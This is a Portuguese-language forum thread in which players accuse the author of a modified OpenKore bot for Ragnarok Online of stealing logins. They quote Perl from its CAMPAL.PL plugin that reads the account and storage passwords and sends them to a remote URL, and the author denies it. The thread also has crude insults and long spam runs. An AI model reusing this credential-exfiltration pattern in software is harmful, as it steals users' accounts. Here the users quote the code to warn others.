Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Openkore 3.0 editado,com esse BOT é possivel uzalo em XP,VISTA,SEVEN,100% RENEWAL

Posts Recomendados

vai na pasta PLUGIN, acha o arquivo CAMPAL.PL escolhe ABRIR COMO e poe BLOCO de NOTAS que voces vao ver isso

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

é o codigo que esse debil mental ai usa pra roubar as senhas de qualquer pessoa que logar.

deixem de ser burros, nao baixem mais isso.

Pior coisa que tem é ser bot, ANALFABETO e ainda tentar roubar a senha dos outros kkkkkkk ! LIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXO

Nao baixe esse bot, ta com virus.

LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXOLIXO LIXO LIXO

Link para o comentário
Compartilhar em outros sites

ou, finalmente tireri as ss xD

qnd eu ligo da esse erro:

dai se eu naum mando relogar com o comando relog ele da esse erro:

e depois de muito mandar relogar ele finalmente liga, mas as vezes da esse erro:

e de vez em quando meu char fica parado sem fazer nada,tenta atacar mais naum consegue, meu sacerdote se perde as vezes(alias, ele se perde menos com o seu bot do que com o do killerzium)

ajuda eu aew.

Link para o comentário

nao consigo conectar ao bot de jeito nenhum....

uso o windows XP

faço tudo certo como manolo pede...

mas apos eu colocar a senha/usuário da

"Não foi possível conectar ao servidor."

ja tou um tempo tentando mas nao consigo de jeito nenhum...

Link para o comentário

vai na pasta PLUGIN, acha o arquivo CAMPAL.PL escolhe ABRIR COMO e poe BLOCO de NOTAS que voces vao ver isso

use Utils qw(urlencode);

$ua->timeout(10);

$ua->env_proxy;

$senha $kafra");

é o codigo que esse debil mental ai usa pra roubar as senhas de qualquer pessoa que logar.

deixem de ser burros, nao baixem mais isso.

Claro né seu debil mental, olha o tempo que eu uso o forum, olha a sua conta que foi criada mês passado, ladrão ANALFABETO RETARDADO. Fica roubando carteiro mesmo, seu lixo, pra sustentar o vício da put4 da sua mãe, aquela maconheira! Aqui vc nao rouba mais, só os retardado que merecer muito mesmo.

Link para o comentário

Pesso a algum moderador q feche esse topico

tbm fui robado mas perdi pouca coisa...

meros 3 kk q tava no bot...

meia hora de venda consigo tudo de novo...

Esse mlk é muito noob q eskeceu de olhar os itens

so pegou a grana

se ele pegasse os itens eu ia fica macho...

jur especial [4]eskeleto soldado

e muito mais.....

use Utils qw(urlencode);

$ua->timeout(10);

$ua->env_proxy;

$senha $kafra");

$logonAttempt = 1;

$logonTimeout{time} = time();

}

} elsif( ($type eq "message") && ($domain eq "connection") ){

# Logon success (account info received)

if( ($message =~ /-Account Info-/) ||

($message =~ /-Informa(.*)s da Conta-/) ){

$logonAttempt = 0;

Link para o comentário

keyloger

minha dica é que façam um ponto de restauração ... baixei instalei o pearl e o openkore não funcionou até ai beleza'=' porém mais tarde tava jogando Bro e derepente apareceu uma tela azul falando que tinha dado erro no windows e que iria reiniciar o pc para evitar problemas.. tive q restaurar'='

@edit ta explicado o porque do windows desligar ele detectou o keylogger inda bem que nem loguei senão ia perde td =[

Link para o comentário

esse cara que ta falando isso e o mesmo cara ele tem varias contas e fica falando que foi roubado,meu bot tem scan do virus total que passam mais de 60 antivirus para detectar algo e ta limpo o bot,nao deem moral pra esse nub apenas uzem sem medo desse nubb que quer zua com o bot dos outro,ou passem scan vcs mesmo para conferir

Link para o comentário

ei cara entao me responde pq no arquivo CAMPAL.PL

tem akela linha de comando ????

exatamente explique o que seria aquela linha ali do comando.. ???

se realmente n é keylloger ou algo parecido=[ pq aqui em casa meu antivirus pelo jeito detectou e desligou o pc antes de entrar no bro..

Link para o comentário

nao tem nd la,tanto se vc digitar aquele indereco la nao vai entrar em lugar nenhum,e seu antivirus nao detecto nd simpelsmente seu pc travo,quando antivirus detecta algo ele enuncia e pede pra vc tomar as pregaucoes excluir ou mandar para quarentena,esse bot foi passando no scan do virus total aonde tem mais de 60 antvirus e garanto que o sue ta no meio deles

Link para o comentário

te hoje vcs nao sabem da historia dos chineses,que sabem as conta de todos da levleup,os cara invadiram o sistema da levelup e pego senhas de todo mundo la,eu mesmo perdi uma conta com 23b sem uzar bot nem nd nela,simplesmente vcs tem que analizar o caso

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.